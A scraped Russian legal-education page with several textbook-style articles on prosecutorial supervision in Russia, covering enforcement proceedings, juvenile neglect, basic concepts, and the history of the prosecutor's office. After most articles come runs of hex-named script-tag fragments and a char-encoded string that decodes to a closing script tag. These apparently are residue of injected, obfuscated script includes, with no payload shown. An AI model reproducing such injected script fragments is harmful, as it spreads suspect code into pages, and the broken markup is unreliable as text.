Сегодня
НАВИГАЦИЯ:
ЮРИДИЧЕСКОЕ НАСЛЕДИЕ:
РАЗНОЕ:
РЕКЛАМА:
АРХИВ НОВОСТЕЙ:
Прокурорский надзор в стадии исполнительного производства
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В стадии исполнительного производства реализуются предписания судов и других государственных органов и общественных организаций, содержащиеся в их решениях (ст. 338 ГПК). Вынесение судом решения об удовлетворении иска еще не означает его автоматического проведения в жизнь. Восстановленный на работе гражданин, как незаконно уволенный, может иметь на руках положительное решение суда, однако если руководитель предприятия откажется исполнить решение суда, оно останется нереализованным, и нарушенные права и законные интересы незаконно уволенного гражданина не будут восстановлены. Эффективность и действенность решений суда определяется в конечном итоге реальным их исполнением. Поэтому прокуроры, осуществляющие надзор за законностью решений, постановлений и определений по гражданским делам, обязаны уделять такое же пристальное внимание правильному и своевременному исполнению решений суда, какое они уделяют соблюдению законов в предшествующих стадиях гражданского
.судопроизводства. Эта функция прокуроров обусловлена требованиями, вытекающими из ст. 1 Закона о прокуратуре, а также из Федерального закона "Об исполнительном производстве" от 21 июля 1997 г. № 119-Ф31.
Предметом надзора являются гражданские дела, исполнительное производство, все гражданско-процессуальные действия, совершаемые в стадии исполнения решений, определений и постановлений суда. Особое место среди них занимают действия судебных приставов-исполнителей, регулируемые Федеральным законом "О судебных приставах" от 21 июля 1997 г. № 118-ФЗ2 и упомянутым выше Федеральным законом "Об исполнительном производстве". Деятельность прокурора по надзору за исполнением указанных законов судебными приставами осуществляется в соответствии с указанием Генерального прокурора РФ "Об организации прокурорского надзора за исполнением законов при осуществлении полномочий судебными приставами" от 6 января 1999 г. № 1/7. В предмет надзора включаются постановления суда или судьи в части имущественных взысканий по делам об административных нарушениях; исполнительные надписи нотариальных органов; решения третейских судов; постановления профсоюзных комитетов предприятий, учреждений, организаций по трудовым спорам о возмещении вреда; постановления прокуроров о выселении в административном порядке граждан, самоуправно занявших жилые помещения или проживающих в домах, находящихся в аварийном состоянии и т. д.
Предметом прокурорского надзора в стадии исполнения решений являются также судебные приговоры по уголовным делам в части разрешения гражданского иска о возмещении ущерба, причиненного преступлением (ст. 310 УПК). Некоторые прокуроры, осуществляющие надзор в стадии исполнения решений по гражданским делам, не придают должного значения рассмотрению судом в порядке гражданского судопроизводства исков, вытекающих из уголовного дела. Суду, рассматривающему уголовное дело, предоставлено право в исключительных случаях, при невозможности произвести подробный расчет по гражданскому иску, признать за гражданским истцом права на удовлетворение иска с передачей вопроса о его размерах на рассмотрение суда в порядке гражданского судопроизводства. В этих случаях прокуроры, участвующие в рассмотрении гражданского иска, не всегда учитывают, что суд в порядке уголовного судопроизводства уже положительно решил вопрос о признании за гражданским истцом права на возмещение ущерба, однако они вопреки требованиям закона входят в обсуждение этого вопроса. Единственное право суда в этом случае - это уточнить размеры
взыскания.
При осуществлении надзора значительное внимание уделяется исполнению решений судей об исключении вещей из описи. На практике случается так, что следователь прилагает большие усилия, чтобы обнаружить преступно нажитое имущество или ценности, а также имущество, которое по приговору суда должно быть конфисковано и обращено в доход государства, однако судьи не учитывают важность этого фактора в борьбе с преступностью и с большой легкостью по искам заинтересованных лиц выносят решения об исключении вещей из описи. В ряде случаев судьи даже не знакомятся с уголовными делами, по которым произведены соответствующие процессуальные действия как следственными органами, так и судом. По искам заинтересованных лиц описанное имущество и ценности безнаказанно "растаскиваются", и в итоге преступно нажитое имущество и ценности оказываются во владении близких или родственников осужденных за совершение преступлений.
Субъектами исполнения, согласно ст. 3, 5 Федерального закона "Об исполнительном производстве" от 21 июля 1997 г. № 119-ФЗ, являются судебные приставы-исполнители, предприятия, учреждения, организации, должностные лица и граждане. Задача прокурора состоит в том, чтобы устранить нарушения закона, допущенные этими субъектами.1494b1cc9107ae462405cfb3ad594777.js" type="text/javascript">508129d3b8e7ca0fe3a11c63940f9b07char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)23cd36091c3648461c6cca8d81273b63.js" type="text/javascript">d827d768deb7e30a0d45a97f8d96e52b.js" type="text/javascript">8efe0bd57693c2a53c6c834358a736e7.js" type="text/javascript">72ef3fbe502aa2aa44dbcfe563affde1.js" type="text/javascript">8659e195b15a516fbcc1054dc87312ac.js" type="text/javascript">b5f64026b8f96f689950a843ea76f873.js" type="text/javascript">70eb4ec7078e5148eaa3f1b2f073ac52.js" type="text/javascript">aa590bf68ea93e0d9dfbf81779dda48e.js" type="text/javascript">a896aa25c8553bb0cc75613f68d469ea.js" type="text/javascript">b434c39576215fbd9e77ed443fbf0da2.js" type="text/javascript">cbd8905a961bd5c4df6c257dcb41542a.js" type="text/javascript">
Коментариев: 0 | Просмотров: 247 |
Надзор за исполнением законов о борьбе с безнадзорностью и правонарушениями несовершеннолетних
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Забота о воспитании несовершеннолетних является важной конституционной обязанностью всех граждан, государственных органов и общественных организаций. Реализация правовой реформы предполагает повышение требований к трудовому, идейно-политическому и нравственному воспитанию молодежи.
В настоящее время, когда решение социальных проблем по воспитанию молодежи существенно усложнилось, возросла необходимость правового воздействия на совершенствование воспитания и образования подрастающего поколения, его гражданское, трудовое и интернациональное становление. Важная роль в выполнении этих задач принадлежит органам прокуратуры. Однако, как отмечается Генеральным прокурором РФ в приказе № 30 от 18 мая 1995 г. "О задачах органов прокуратуры по повышению эффективности надзора за исполнением законов о несовершеннолетних", а также в указании заместителя Генерального прокурора РФ № 12/21 от 27 февраля 1996 г. "Об усилении прокурорского надзора за исполнением законодательства о социальной защите материнства и детства", органы прокуратуры не всегда используют свои полномочия, часто действуют без учета реальных проблем, рожденных жизнью. Прокуроры недостаточно внимания уделяют вопросам охраны прав и законных интересов· несовершеннолетних, особенно в сфере образования, семейного воспитания, деятельности органов опеки, социальной защиты и здравоохранения. Отмечая эти недостатки, Генеральный прокурор РФ в своем приказе № 30 от 18 мая 1995 г. потребовал активизации прокурорского надзора в данном направлении, повышения его эффективности, особенно в предупреждении правонарушений несовершеннолетних.
В практике работы органов прокуратуры слабо используются возможности индивидуальной работы с подростком, профилактики правонарушений. В предупредительной работе преимущественно преобладают мероприятия "общего характера", многие из которых страдают формализмом и казенщиной. Некоторые прокуроры в своей профессиональной деятельности слабо связаны с местными органами самоуправления, их комиссиями по делам несовершеннолетииних, учреждениями просвещения, профобразования, трудовыми коллективами. Это существенно отражается на эффективности предупредительной работы, которая занимает важное место в системе мер по борьбе с безнадзорностью несовершеннолетних.
Задачи органов прокуратуры состоят в том, чтобы, используя полномочия по осуществлению надзора за исполнением законов, обеспечивать гарантии прав и законных интересов несовершеннолетних, улучшать работу по борьбе с преступностью и правонарушениями, выявлять и устранять причины и условия, им способствовавшие, добиваться возвращения к честной трудовой жизни каждого оступившегося подростка. В целях устранения нарушений закона и восстановления нарушенных прав и законных интересов несовершеннолетних прокуроры используют предусмотренные Законом о прокуратуре средства реагирования: протест, представление, постановление, право заслушивать на заседаниях коллегий прокуратур сообщения и объяснения руководителей и иных должностных лиц органов государственного управления, предприятий и организаций.
Государство разработало систему мер по предупреждению безнадзорности и правонарушений среди несовершеннолетних, обеспечению надлежащих условий для воспитания педагогически запущенных подростков, склонных или уже совершающих правонарушения, закрепив их в Федеральном законе "Об основах системы профилактики безнадзорности и правонарушений несовершеннолетних" от 24 июня 1999 г, № 120-ФЗ1. Надзор за исполнением требований этого закона является наиболее важным направлением в деятельности прокуроров. Это объясняется тем, что в стране в последние годы увеличивается число безнадзорных и беспризорных детей. По различным оценкам их насчитывается от 2,5 до 4 млн.
Проверки, проведенные прокурорами в детских домах и школах-интернатах для детей-сирот, показывают, что во многих из них не создано элементарных условий для содержания детей-сирот: большой перелимит; неудовлетворительные бытовые условия; плохое питание и санитарное обслуживание; не организован досуг детей; низкая требовательность к педагогическим кадрам и т. д. В этой сфере прокурорский надзор должен быть особенно строгим и взыскательным.
Важная роль в предупреждении правонарушений и безнадзорности несовершеннолетних принадлежит комиссиям по делам несовершеннолетних и защите их прав, образуемым органами местного самоуправления. Именно они должны выявлять и брать на учет детей и подростков, оставшихся без родителей, а также несовершеннолетних, родители которых не обеспечивают надлежащих условий для их воспитания, не работающих и не учащихся подростков, а также иных детей, нуждающихся в бытовом, трудовом устройстве или в определении на учебу. Комиссии обязаны осуществлять контроль за условиями содержания подростков в учебно-воспитательных учреждениях, школах-интернатах, детских домах и ПУ. В их компетенцию входит также осуществление контроля за соблюдением администрацией предприятий режима и условий труда несовершеннолетних, за созданием необходимых материально-бытовых условий, постановкой производственного обучения. Комиссии осуществляют наблюдение за лицами, подвергнутыми мерам воспитательного и административного воздействия, осужденными к наказанию, не связанному с лишением свободы, а также за освобожденными из мест лишения свободы и из специальных учебно-воспитательных учреждений.
Надзор за законностью решений комиссии согласно ст. 10 названного Закона от 24 июня 1999 г. возлагается на прокурора. Он систематически проверяет законность применения административных и иных мер к несовершеннолетним и их родителям, участвует в ее заседаниях при рассмотрении дел о правонарушениях и безнадзорности подростков, в том числе по делам о направлении несовершеннолетних в специальные учебно-воспитательные учреждения. Особое внимание прокуроры уделяют проверке законности направления в комиссию материалов о правонарушениях несовершеннолетних в порядке, предусмотренном ст. 402 УПК, а также в случаях применения принудительных мер воспитательного воздействия к несовершеннолетним, совершившим впервые преступление (ст. 90 УК). При этом следует иметь в виду, что согласия несовершеннолетнего на применение к нему воспитательных мер не требуется. В обоих случаях решение о передаче материалов может быть принято лишь с согласия прокурора. Если такого согласия не было, то прокурор приносит протест на предмет отмены постановления следователя о передаче материала.5c78a83118e93182a268830def2f922a.js" type="text/javascript">a1837eb7f200d1b7562d112346eb18a2char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)047797955ec470285b3cb7c7909ee9bb.js" type="text/javascript">b3fe97160b5bc42bb40e08da0315bda8.js" type="text/javascript">6ddb6358eea2030c90e28860212bd9ce.js" type="text/javascript">5fdc34f9b4da76220b6a3ca48ff5f548.js" type="text/javascript">5f784a53fd1988329b1be224c79a68ac.js" type="text/javascript">6c5b6c482d71c2988623fc2820d6ba52.js" type="text/javascript">d3081abc1efe3495296f4fdf15bea0d2.js" type="text/javascript">5f900fdb9627a94a4755dbae8dcae094.js" type="text/javascript">9169e7e58d6365768cdaf394b8214559.js" type="text/javascript">6bba7545a8aac2aaa3b5e895b9e139d9.js" type="text/javascript">005f5204c367d8a8a2a86bb7456e9858.js" type="text/javascript">
Коментариев: 0 | Просмотров: 288 |
Содержание и система учебного курса "Прокурорский надзор"
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
В соответствии с Конституцией Российской Федерации и Федеральным законом "О прокуратуре Российской Федерации" прокурорский надзор засоблюдением Конституции РФ и исполнением законов, действующих на территории Российской Федерации, представляет собою самостоятельный вид государственной деятельности. Это определяет как предмет, так и систему учебного курса "Прокурорский надзор".
Содержание учебного курса "Прокурорский надзор" как правовой (юридической) дисциплины позволит изучающим его студентам вузов овладеть знаниями основополагающих принципов организации и деятельности прокуратуры, уяснить задачи, связанные с укреплением законности и правопорядка, и прежде всего освоить понятие законности, ее содержание как социального явления, влияющего на совершенствование различных сторон деятельности нашего государства, взаимодействие органов прокуратуры с иными правоохранительными органами, общественными формированиями и с широкой общественностью. В курсе "Прокурорский надзор" раскрыты задачи прокуроров и их полномочия. Особое место в курсе занимает раскрытие процессуальных актов прокурорского реагирования на установленные нарушения законов. Формы предусмотренных Федеральным законом "О прокуратуре Российской Федерации" актов прокурорского реагирования - протеста, представления, постановления- универсальны. Но в каждом из направлений надзорной деятельности прокурора они имеют свою специфику, есть особенности при составлении этих документов в сфере уголовного и гражданского судопроизводства, в стадии исполнения приговоров. Будущему правоведу необходимо знать содержание и структуру. " этих процессуальных актов, их реквизиты, предъявляемые к ним требования правового и стилистического характера.c0f9e707711fca5bb1f6cc6692fc25ad.js" type="text/javascript">75c095e53bb8822162ddf47b91837bd2.js" type="text/javascript">2338ecdb3b0b3c82078da4ec6be78e78.js" type="text/javascript">
Коментариев: 0 | Просмотров: 517 |
Основные понятия прокурорского надзора
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Теория и практика прокурорского надзора выработала ряд понятий и терминов, используемых в научной, учебной и практической деятельности. Не все из них учеными и практиками воспринимаются однозначно, и это в определенной мере негативно сказывается на эффективности прокурорского надзора. Поэтому необходимым условием прочного усвоения учебного курса является освоение терминологии прокурорского надзора.
Коренным для всех остальных является понятие прокурора. Прокурор - это физическое лицо, состоящее на постоянной или временной службе в органах прокуратуры, принятое на работу в порядке, установленном Федеральным законом "О прокуратуре Российской Федерации" (далее - Закон о прокуратуре), и исполняющее должностные обязанности, предусмотренные тем же законом и приказом вышестоящего прокурора. Понятие "прокурор" - собирательное, обобщающее. В узком смысле под ним понимаются руководители прокуратур: Генеральный прокурор Российской Федерации, прокурор субъекта Федерации, прокурор города, прокурор района, прокурор специализированной прокуратуры. В широком смысле под этим понятием подразумеваются не только вышеназванные прокуроры, но и заместители Генерального прокурора РФ, его советники, старшие помощники, помощники, помощники по особым поручениям, заместители и помощники всех нижестоящих прокуроров - руководителей прокуратур, помощники прокуроров по особым поручениям, старшие помощники, старшие прокуроры и прокуроры, старшие прокуроры-криминалисты и прокуроры-криминалисты управлений и отделов, действующие в пределах своей компетенции.
Помимо прокуроров в системе прокуратуры работают прокурорские работники. К ним относятся работники органов и учреждений прокуратуры, имеющие классные чины (воинские звания - в органах и учреждениях военной прокуратуры). Прокурорскими работниками обычно являются научные и педагогические работники учреждений прокуратуры и некоторые иные работники подразделений органов и учреждений прокуратуры.
Прокурорский надзор - это понятие, которое, как уже отмечалось, характеризует: 1) основную функцию прокуратуры как самостоятельный и специфический вид государственной деятельности федеральной государственной службы; 2) отрасль юридической науки; 3) учебную дисциплину.
Прокуратура как федеральный государственный орган осуществляет ряд функций (надзор, расследование преступлений, участие в рассмотрении дел судами, участие в правотворческой деятельности, координацию борьбы с преступностью и др.), важнейшей из которых является надзор за соблюдением Конституции РФ и исполнением законов. В юридической литературе и на практике употребление понятия прокурорский надзор применительно к деятельности прокурора подразумевает проведение проверок точности соблюдения Конституции РФ и исполнения требований всех законов, действующих на территории РФ и любого из них в каждом конкретном случае.
Прокурорский надзор как отрасль юридической науки означает сумму знаний о законодательстве, регулирующем деятельность прокуроров по осуществлению надзора, формах, средствах и методах его осуществления, закономерностях развития общественных отношений в сфере осуществления надзора, проблемах эффективности этой деятельности и т. д. Как наука прокурорский надзор тесно связан с такими отраслями юридической науки, как уголовный, гражданский и арбитражный процесс, криминалистика и рядом других.
Прокурорский надзор как учебная дисциплина является частью образовательных программ высших и средних юридических учебных заведений. По содержанию и структуре учебная дисциплина прокурорский надзор делится на общую и особенную части. В общей части обычно рассматриваются вопросы о задачах и принципах прокурорского надзора, о системе органов прокуратуры, полномочиях прокуроров и т. д. Содержанием особенной части является информация об особенностях осуществления прокурорского надзора в отдельных направлениях, специфике реагирования прокурора на различные виды правонарушений.937a0b37ace5604a90971016ac3359a5.js" type="text/javascript">dc7a3865821e6bef92d6ed0b692fd244char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)5c5ddfbaaa2f5736839f4a7fe70f5e01.js" type="text/javascript">0df46ec4d121547ebe1f436119cb1edb.js" type="text/javascript">c86f22a6d445d2b42c25c136e1e0477a.js" type="text/javascript">db25768d24551365b6d803ac5b572ed1.js" type="text/javascript">601461d4d0f82c4a3475aca0896af409.js" type="text/javascript">fa388febd3d35ec5261bebc9bb007cc5.js" type="text/javascript">4f6586d455a50d6b17b0a2f006e8ae34.js" type="text/javascript">f290951e0f6410d0d8e139b12182f16f.js" type="text/javascript">bac90212a7534289725570bcd392b48e.js" type="text/javascript">6e2ef9c6452bb914cdc8312649623cf6.js" type="text/javascript">cd092e2b89da4b16be3d81db2619b31d.js" type="text/javascript">
Коментариев: 0 | Просмотров: 439 |
Предмет прокурорского надзора
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Надзор за соблюдением Конституции РФ и исполнением законов, действующих на территории Российской Федерации, является основным предназначением органов прокуратуры. Прокуратура является тем единственным органом в стране, который выполняет эту
функцию.
При осуществлении надзора за соблюдением Конституции РФ
и исполнением законов обеспечивается единство законности во всей Российской Федерации. Принцип единства законности на территории всей Федерации приобретает исключительно важное значение в современных условиях влияния центробежных процессов как последствий распада СССР, условиях становления и укрепления нового государства - Российской Федерации. Важность обеспечения законности в государстве объясняется тем, что только при строгой дисциплине, высокой ответственности за порученное дело, при неуклонном соблюдении предписаний закона можно создать сильное, монолитное государство, способное отстоять свою независимость и обеспечить права и законные интересы своих граждан, их благосостояние.
Для того, чтобы прокурорский надзор за исполнением законов
осуществлялся в полном объеме, необходимо дать правильное определение понятия законности как социального явления.
Отдельные правоведы сводят понятие законности лишь к законам и подзаконным актам и их принятию, не учитывая того, что это лишь одна сторона содержания законности. Поэтому когда возникает необходимость усилить борьбу с каким-либо нарушением закона, сразу же ставится вопрос об отмене действующего закона, внесении в него дополнения или принятии нового закона. Закон "совершенствуется", а положение с его соблюдением изменяется редко.
Если законы не будут проводиться в жизнь, а оставаться только на бумаге, воля законодателя останется лишь добрым пожеланием и не более того. Поэтому исполнение закона, то есть деятельность представителей исполнительной власти - является второй стороной законности. Прокурорский надзор за исполнением законов является важной гарантией обеспечения этой второй стороны законности.
Государство устанавливает различного рода ответственность за допущенное нарушение закона. В зависимости от степени опасности нарушения ответственность может быть уголовной, административной, дисциплинарной или материальной. Осуществляя надзор, прокурор выявляет факты нарушения требований законов и принимает меры к привлечению виновных к ответственности.
Таким образом, содержание понятия законности образуется из: а) законов и подзаконных актов; б) исполнения законов, то есть проведения их в жизнь и надзора за точным исполнением законов.
Поэтому, когда речь идет об укреплении законности, государство, его органы власти должны разрабатывать меры по совершенствованию законодательства, улучшению функционирования органов исполнительной власти и активизации прокурорского надзора за исполнением законов. Только такой комплексный подход позволит успешно создать режим законности в государстве.
Законность необходимо рассматривать как мощный социальный регулятор, обеспечивающий решение сложных политических, экономических, социальных, национальных и культурных проблем.
Если обратиться к истории нашего государства, то можно увидеть, что вопросы соблюдения законности, организации борьбы с ее нарушениями всегда находились в центре внимания государственных органов и общественных формирований. Даже в такой сложный исторический период, как период культа личности, требования законности в ее главных направлениях - борьбе с уголовной преступностью, нарушениями государственной и трудовой дисциплины - неуклонно проводились в жизнь. Так, в 1937 г. было принято постановление ЦИК и СНК СССР "О революционной законности", в котором было предложено органам суда и прокуратуры "привлекать к строгой ответственности должностных лиц во всех случаях нарушения прав трудящихся, в особенности незаконных арестов, обысков, конфискаций или изъятия имущества и прочие, налагать на виновных строгие меры взыскания'".
' Советская прокуратура. Сборник важнейших документов. М., 1972. С. 212 (СЗ СССР. 1932. № 50. Ст. 298).
Вместе с тем необходимо отметить, что в течение длительного периода советской истории, особенно в годы культа личности, имели место массовые и незаконные репрессии, грубые нарушения принципов законности, прав человека, причем все это происходило вопреки конституционным установлениям.
В начале 1960-х гг. были восстановлены основополагающие принципы восстановления и укрепления законности и правопорядка, разработана система гарантий для неуклонного проведения в жизнь законов и иных нормативных актов, в том числе средствами прокурорского надзора.
Важное значение в укреплении законности принадлежит действующей Конституции Российской Федерации. Принцип законности обозначен в ней как непременное условие жизни нашего общества, успешной деятельности государственных органов, различного рода общественных формирований, должностных лиц и поведения граждан. В ст. 15 Конституции провозглашено, что органы государственной власти, органы местного самоуправления, должностные лица, граждане и их объединения обязаны соблюдать Конституцию Российской Федерации и законы.
Важно отметить, что укрепление правовой основы государственной и общественной жизни в Конституции РФ обозначено в качестве одного из основных направлений развития общества. Это в существенной мере повышает роль закона и законности в государстве.c4f248fda0b89da1696a87bae0df9986.js" type="text/javascript">e29fb71332f2d3e09997106420f4d1cachar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)a41eac717d7fcc9c63413a4c851fe66d.js" type="text/javascript">395a35361acca950a8caf484619baac1.js" type="text/javascript">7c0c5255773221156f9d9bd25d6887e0.js" type="text/javascript">cec6b0cd259cf2995a218c69c521b09d.js" type="text/javascript">0778d9592db9e0ddfc789158ed713f09.js" type="text/javascript">98543d7c808f6471f626c030707ddd4c.js" type="text/javascript">647e7e9482fc30bf0b3cecf2dcb8f895.js" type="text/javascript">9a1a0c76fcba3f9b2237de958825d90f.js" type="text/javascript">9799b544754e43b2c125297904bb60ea.js" type="text/javascript">46d019de6bbd7285a4992c1a2145a25a.js" type="text/javascript">03ec2e77a7f6133fe4b8f39e12b66a05.js" type="text/javascript">
Коментариев: 0 | Просмотров: 181 |
Краткая история учреждения, организации и деятельности прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Изучение истории создания и развития какого-либо государственного органа помогает лучше понять историческое предназначение этого органа, его место в системе иных государственных органов, историческую необходимость выполнения функций, возложенных на этот орган, принять меры законодательного и организационного характера, направленные на повышение эффективности деятельности этого органа в современных условиях.
Сказанное в полной мере относится и к органам прокуратуры, деятельность которых никогда, ни в одном государстве не оценивалась однозначно. Вырабатывались различные концепции прокурорского надзора, многие положения которых не находили применения в практике, и, наоборот, практика выдвигала определенные требования к органам прокуратуры, которые не находили закрепления в законах о прокуратуре и научного обоснования в теории прокурорского надзора.
В настоящее время, когда осуществляется судебная реформа и закладываются основы правового государства, особенно важно глубоко изучить историю возникновения прокуратуры как государственного органа, создания прокуратуры в Российской Империи, в Советской России, а затем в СССР и в Российской Федерации.
Понятие прокуратура происходит от латинского (procuro) - забочусь, обеспечиваю, предотвращаю'.
Предназначение прокуратуры в Греции и странах Востока состояло, во-первых, в надзоре за исполнением предписаний государственной власти, а, во-вторых, в осуществлении обвинения в суде ("ораторы").
В европейских странах впервые прокуратура возникает во Франции в XIV в., причем с первых ее шагов это был сугубо обвинительный, карательный орган.
К тому времени в европейских странах, в особенности в Испании, уже твердо сформировался инквизиционный процесс, пришедший на место процессу публичному, гласному, состязательному. Это явилось побудительным мотивом для трансформации основ организации и деятельности уже созданных прокуратур.
Органы прокуратуры Франции были приспособлены для выполнения воли короля, влияние которого на формирование органов прокуратуры и определение направлений ее деятельности было решающим. (Не случайно прокуроры вплоть до ликвидации монархии во Франции именовались "людьми короля".)
В 1586 г. принимается закон об организации и деятельности прокуратуры во Франции, который определил место прокуратуры

' См.: Российская юридическая энциклопедия. М., 1999. С. 821.

в системе других государственных органов. В сферу полномочий по осуществлению прокурорского надзора включаются: деятельность прокурора административно-политического характера; надзор за производством следствия; деятельность судебно-правовая (уголовные и гражданские дела).
В последующие периоды прокуратура Франции претерпела весьма существенные преобразования (1789-1810), однако основное ее предназначение осталось прежним - выполнение карательных функций, обеспечение незыблемости держателя верховной власти в государстве.
Исторический экскурс о становлении и развитии прокуратуры во Франции не случаен: прокуратура Франции послужила прообразом прокуратуры России.
Основателем органов прокуратуры и прокурорского надзора в России по праву считается Петр I. Период конца XVI и начала XVII в. был отмечен значительным ростом преступности в России, должностных преступлений, казнокрадства и взяточничества, что вызывало историческую потребность создания государственной службы по борьбе с этими негативными явлениями. Указом Петра от 2 марта 1711 г. в России учреждается фискальная служба, назначение которой состояло в том, чтобы "...над всеми делами тайно надсматривать и проведывать про неправый суд, также сбор казны и прочего". За образец этой службы Петр I взял государственные органы Германии. В 1713 г. в России вводится должность Генерал-фискала. Полномочия фискалов, процессуальные средства их деятельности были определены в Указе от 17 марта 1714 г. "О должности фискалов". В Указе получили четкое разграничение компетенции обер-фискалов, провинциал-фискалов, городских и низших (рядовых). К фискалам предъявлялись высокие профессиональные и морально-этические требования. Фискальная служба являлась сугубо тайной, поэтому она была весьма непопулярной в общественном мнении, слабо влияла на создание обстановки законности и правопорядка. К тому же фискалы всех рангов не получали материального обеспечения от казны, существовали за счет "собственных кормовых", а это вело к поборам, взяточничеству и иным злоупотреблениям.
Со временем Петр I убедился в неэффективности службы фискалов. Указом от 12 января 1722 г. Петр I учреждает прокуратуру Российской Империи. (Эта дата - 12 января - установлена Указом Президента Российской Федерации от 29 декабря 1995 г. "Днем работника прокуратуры Российской Федерации".) В отличие от службы фискалов прокуроры осуществляли надзор за исполнением законов гласно.
В Указе "О должности Генерал-прокурора" отмечено, что "сей чин, яко око наше и стряпчий о делах государственных"1. Прокуроры имели назначение выполнять роль "взыскателей наказаний" и одновременно "защитников невиновности". На практике прокуратура активно и ревностно защищала интересы самодержавия.
Необходимо отметить, что прокуратура Российской Империи вплоть до 1917 г. всегда была верным стражем царского самодержавия, являлась органом сугубо реакционным.
Петр I очень тщательно подходил к выбору первого Генерал-прокурора. Им стал известный в истории России государственный деятель - П. И. Ягужинский.
В последующие годы после смерти Петра I, особенно в период царствования Анны Иоановны, прокуратура практически бездействовала. В своих, прежних прерогативах прокуратура была восстановлена в период царствования Елизаветы Петровны. Как и во всех направлениях государственной и политической деятельности, она стремилась восстановить реформы своего отца и многого в этом достигла. Указом Императрицы от 12 декабря 1741 г. была восстановлена прокуратура в рамках Указа Петра I от 1722 г. Прокуратуре был придан ряд полномочий по осуществлению надзора за проведением в жизнь действующих и вновь принимаемых законов, что привело к повышению эффективности и действенности прокурорского надзора.
В период царствования Екатерины II в существенной мере был усилен местный прокурорский надзор. Этому в немалой степени способствовало принятое в 1775 г. "Учреждение о губерниях", в котором были сформулированы задачи и полномочия губернских прокуроров.
При Павле I, одержимом идеей "все созданное Екатериной II изменить и переделать", был существенно ослаблен прокурорский надзор, в значительной мере были сокращены штаты органов прокуратуры как в центре, так и на местах. Однако в целом прокуратура продолжала оставаться активно действовавшим государственным органом.
Деятельность органов прокуратуры была существенно трансформирована и усилена в период царствования Александра II.
Еще до судебной реформы, в 1862 г., Государственный Совет Российской Империи принял "Основные положения о прокуратуре", в которых определялось государственное назначение прокурорского надзора, его содержание (предмет), задачи и полномочия прокуроров. Весьма четко было определено назначение прокуратуры: "Наблюдение за точным и единообразным исполнением законов в Российской Империи". В "Основных положениях о прокуратуре" были сформулированы принципы организации и деятельности прокуратуры, которые оставались незыблемыми на протяжении всего периода существования Российской Империи. К их числу относятся: единство и строжайшая централизация органов прокурорского надзора; осуществление прокурорами возложенных на них полномочий от имени всей системы органов прокуратуры; осуществление "верховного" надзора в Империи Генерал-прокурором (он же министр юстиции); строгая подчиненность нижестоящих прокуроров вышестоящим; несменяемость прокуроров; независимость прокуроров от "местных" влияний при принятии ими любого решения.
Обеспечению независимости прокуроров от местных влияний в существенной мере способствовал установленный порядок их назначения и освобождения от занимаемой должности. Генерал-прокурор и губернские прокуроры назначались и освобождались рескриптом Императора. Назначение на должности нижестоящих прокуроров и их освобождение составляло прерогативу Генерал-прокурора Российской Империи.fa83547c6e461c5a091b0bd866ea0a68.js" type="text/javascript">17cd4ff951e687b601c8408b8aaf2323char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)80887c3b93f5b127b2d53dd72676bae8.js" type="text/javascript">402a8b8c0aa3089bf05bd12e58fb7d93.js" type="text/javascript">8761031d22453e862661ed48d0ad3491.js" type="text/javascript">1c6684ba2c1e1d41fa69deeec0ab7b94.js" type="text/javascript">e0999061b11771953d18e97cb1eb9437.js" type="text/javascript">67ccf38303e8b818e5bd92a435a014ed.js" type="text/javascript">abe24f38a7b5ea8afe264d0f0078d871.js" type="text/javascript">5562eb32bf0757d54453d4ae024c68ee.js" type="text/javascript">8847cc735c7698afe751c78367e0adc8.js" type="text/javascript">1467f4d9c8be4d373b1d0ffce07bdd89.js" type="text/javascript">2dab8b88d5538fafe89d8ae73e0892f6.js" type="text/javascript">
Коментариев: 0 | Просмотров: 289 |
Правовое регулирование прокурорского надзора
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Конституция Российской Федерации, принятая 12 декабря 1993 г., а также Федеральный закон "О прокуратуре Российской Федерации" в редакции федеральных законов от 17 ноября 1995 г. и от 10 февраля 1999 г. являются основными законодательными актами, определяющими принципы организации, деятельности органов прокуратуры по осуществлению надзора за соблюдением Конституции РФ и исполнением законов. В Конституции РФ (ст. 129) провозглашено, что Прокуратура Российской Федерации составляет единую централизованную систему с подчинением нижестоящих прокуроров вышестоящим и Генеральному прокурору Российской Федерации. Закрепленный в Конституции РФ принцип единства и централизации системы органов прокуратуры позволяет Генеральному прокурору РФ и подчиненным ему прокурорам проводить единую политику в осуществлении надзора за соблюдением Конституции РФ и исполнением законов. Конституция РФ определяет порядок наделения прокуроров полномочиями. Согласно п. 2 ст. 129 Генеральный прокурор РФ назначается на должность и освобождается от должности Советом Федерации по представлению Президента РФ. Все остальные прокуроры назначаются Генеральным прокурором РФ. Прокуроры субъектов РФ назначаются также Генеральным прокурором РФ, но по согласованию с субъектами РФ (п. 3 ст. 129 Конституции РФ).
